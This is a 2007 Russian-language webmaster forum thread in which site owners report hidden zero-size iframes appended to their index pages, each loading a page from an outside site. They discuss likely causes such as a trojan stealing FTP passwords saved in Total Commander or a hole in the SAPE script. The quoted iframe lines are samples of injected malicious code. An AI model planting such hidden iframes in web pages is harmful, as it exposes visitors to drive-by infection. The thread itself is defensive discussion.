07.07.2007, 13:07 | #1 |
Новичок
Регистрация: 07.07.2007
Сообщений: 9
Вес репутации: 0
|
Справка по антивирусному обеспечению
Доброго времени!
Имею ряд сайтов, подключенных к всеми уважаемой системе SAPE. Но 2 дня назад обнаружил интересную вещь: почти на всех этих сайтах в конец файлов index.html, index.htm, index.php (где что есть) кем-то был добавлен следующий код после тэга </HTML>: Код:
<iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe><iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe> Есть серьезное подозрение, что в скрипте sape.php есть уязвимость, позволяющая модифицировать файлы на сайтах, где он расположен. Ни у кого больше нет таких проблем? |
07.07.2007, 13:48 | #5 |
Злой модератор
Регистрация: 25.03.2007
Адрес: Deep forest
Сообщений: 5,343
Вес репутации: 508
|
А причем тут хостинг сайтов? Вы сами то под линуксом сидите или как? А в Total Commander или каком другом менеджере пароли к некоторым сайтам не забиты были? Разновидностей такого трояна много, все по разному себя проявляют.
|
07.07.2007, 14:04 | #7 |
Специалист
Регистрация: 28.06.2007
Адрес: Odessa
Сообщений: 104
Вес репутации: 213
|
2автор: у меня после </html> стоит только <!-- Use compress gzip -->
))) Ищи проблему у себя. Здравая а может и больная логика подсказывает мне, что если бы было так как сказали ВЫ, то тот кто нашел бы способ изменять файлы через сапу - смог бы найти способ изменить это на ВСЕХ сайтах, а не только у Вас. |
07.07.2007, 15:03 | #8 | ||
Banned
Регистрация: 24.05.2007
Сообщений: 39
Вес репутации: 0
|
Цитата:
Могу привести цитату с моего хостинга: Цитата:
|
||
07.07.2007, 16:04 | #9 |
Ваnnеd
|
блин, из ТС нада парольки убрать, хотя каспер все время работает.. мало ли что.
ЗЫЖ 2автор, повезло, не так уж и страшно. Троян вообще мог убить все файлы
__________________
Осуществляю поддержку сайтов с OpenCart, Bitrix, Wordpress, DLE, Drupal, WebAsyst и пр. Скайп agriboed |
07.07.2007, 17:16 | #10 |
Новичок
Регистрация: 30.05.2007
Адрес: UA
Сообщений: 32
Вес репутации: 211
|
Мне тоже какой-то "доброжелатель" вкатил сегодня
Код HTML:
<iframe src="http://adventureboats.co.nz/skunk/images/index.htm" scrolling="no" frameborder="0" width=0 height=0></iframe> если присадка тупо дописана во все индексы, то меняйте пароль FTP; если как-то "по-уму" - дыра в движке. И, я так понял, что такие изделия проиндексируются, как дополнительные внешние сылки.
__________________
|